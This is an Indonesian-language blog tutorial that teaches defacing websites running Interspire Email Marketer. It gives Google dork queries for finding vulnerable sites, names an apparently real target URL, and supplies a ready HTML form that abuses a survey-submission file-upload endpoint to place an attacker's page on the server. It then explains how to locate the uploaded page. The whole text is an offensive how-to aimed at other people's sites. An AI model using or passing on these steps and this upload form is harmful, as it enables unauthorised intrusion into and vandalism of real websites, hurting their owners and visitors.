Cara Deface Interspire Email Marketer

 


Kali ini saya akan ngasih materi/tutorial deface proof interspire email marketer to rce


Bahan bahan:

- SC deface extensi .html kalo gw pake nama index.html biar directory nya ke index:v

- tools buat execution rce(gw taroh di bawah)

- Exploit: /admin/temp/surveys

/Patch/admin/temp/surveys


Okey langsung saja ke step by step


1.kalian dorking dulu, usahakan dorking di google image

Dork: intext:"admin/temp/surveys" 

Intext:"powered by hairyspire email marketer 6.1.4"

2: jika sudah Nemu website kasih Exploit

Live target+contoh: https://release.test.ppt001.com/admin/temp/surveys/


Nah jika sudah maka akan muncul directory seperti ini


Lanjut ke execution pake tools

Untuk tools nya copy di bawah ini


<!DOCTYPE HTML>

<html lang="en-US">

<head>

    <meta charset="UTF-8">

    <title>INDONESIAN FIGHTER CYBER</title>

</head>

<body>

<form action="https://ISI DENGAN WEBSITE YANG KALIAN DORKING/surveys_submit.php?formId=MASUKIN ANGKA YANG DI DIR" method="post" enctype="multipart/form-data">

    <input type="file" name="widget[0][field][][value]">

    <input type="submit" value="submit" name="submit">

</form>

</body>

</html>


JIKA SUDAH SAVE ITU TOOLS DENGAN EXTENSI .HTML

Kalian buka toolsnya di google maka tampilannya seperti uploader, kalian upload SC deface kalian jika berhasil akan blank putih


Cara manggil nya gimana bang?

Gini cara panggil SC kita, kita kembali ke directory tersebut, klik angka yang kalian pilih, karena gw pilih angka 1337 maka aku klik angka 1337


Nah sudah akan muncul angka baru lagi, SC kalian terletak di angka paling bawah


Klik and boom

Kedeface:)

Lebih baru Lebih lama